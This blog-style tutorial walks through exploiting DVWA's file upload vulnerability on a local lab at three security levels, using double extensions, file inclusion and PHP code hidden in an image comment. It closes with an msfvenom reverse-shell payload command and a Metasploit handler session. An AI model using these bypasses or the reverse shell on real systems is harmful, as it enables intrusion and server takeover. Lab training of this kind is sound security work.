I am so excited, today we will be using Grumpy Cat to execute code, The cat is a legend.

Alright, lets start at the beginning. I already covered File Inclusion as a cause for vulnerabilities. Today I will cover File Upload. Lets start at the beginning.

Low security

As always, low security basically means no security whatsoever, so lets create a PHP file that we will use for our upload, I will call it hack.php.

<?php echo "Hacked"; ?>

When the code in our script executes it will print “Hacked”. Lets try and upload this PHP file.

Uploaded

The interface quite nicely shows us that the file is located at ../../hackable/uploads/hack.php, so all we need to do is to find a way to execute the file.

In this case we can literally just paste the path into the address bar and request the file http://localhost:32770/vulnerabilities/upload/../../hackable/uploads/hack.php. The code from the script ran on the server and the screen shows us “Hacked”.

Medium security

Lets try and upload the same file again.

upload failed

Sadly it will only accept JPEG and PNG images. So what happens if we just rename the file? Lets rename the file to hack.php.png and try to upload it!

It uploads just fine! Now, lets run the code! The address will be almost the same as before: http://localhost:32770/vulnerabilities/upload/../../hackable/uploads/hack.php.png, but the result is quite different!

Run Failed

It tried to display the image to us, that is not what we want! Luckily we can use the File Inclusion vulnerability we found earlier to run this code I think. Lets craft an URL that will work on even the high setting. This will be http://localhost:32770/vulnerabilities/fi/?page=file:///app/hackable/uploads/hack.php.png. Run it and lets see the result:

File Included

That is more like it, the “picture” was included and the contents was execute as PHP code.

High security

Now for the real challenge. None of the previous attacks work at this level; the system will only accept images. But did you know images can have plain text content as well? If you open any image, say of Grumpy Cat, in Gimp (or any other image editor) you can take a look at the image properties. It has a field called Comment and you can add any text you want there, including code.

Gimp

In this case I chose to echo the phpinfo() because when you include only the “Hacked” it will be very hard to find between the rest of the output of the image.

Lets upload this image and then execute it through our file inclusion technique.

Cat Executed

Sure enough, we now have the output from phpinfo() on our screen. This is due to the upload process not stripping out the metadata of the image and the PHP interperter trying real hard to find something that it can execute.

Reverse shell

So, lets try and get shell access again based on this technique. We will use the metasploit framework that comes with Kali Linux.

First thing to do is to generate an PHP file that can connect back to our Kali machine from our DVWA instance. As part of metasploit a tool is available called msfvenom. It is a payload generator and encoder. You can use it to add payloads to regular programs as well as just a plain old PHP file.

msfvenom --arch php --platform php --payload php/meterpreter/reverse_tcp LHOST=172.18.0.1 LPORT=8080  > exploit.php

The command will create a PHP file (--arch and --platform) which will have a reverse_tcp payload and we pass it the LHOST (local host) and LPORT (local port) of the Kali instance. The output is written to explot.php. Take a look at the code and see if you can figure out what it will do, I will wait.

The exploit will open a socket connection over which metasploit can send commands, just as the name advertised. First thing to do now is to let metasploit (type msfconsole in a terminal) listen to port 8080 to receive this connection.

msf > use exploit/multi/handler 
msf exploit(handler) > set LHOST 172.18.0.1
LHOST => 172.18.0.1
msf exploit(handler) > set LPORT 8080
LPORT => 8080
msf exploit(handler) > set payload php/meterpreter/reverse_tcp
payload => php/meterpreter/reverse_tcp
msf exploit(handler) > exploit

[-] Handler failed to bind to 172.18.0.1:8080:-  -
[*] Started reverse TCP handler on 0.0.0.0:8080 
[*] Starting the payload handler...

The exploit/multi/handler exploit allows us to set a payload (reverse_tcp) to be run as a meterpreter listener. When we upload the exploit code and run it, it will connect to this payload handler.

Owned

The browser tab will keep “loading” the page, but you now have full access to the machine! Thats how easy it is to actually take advantage of such a vulnerability.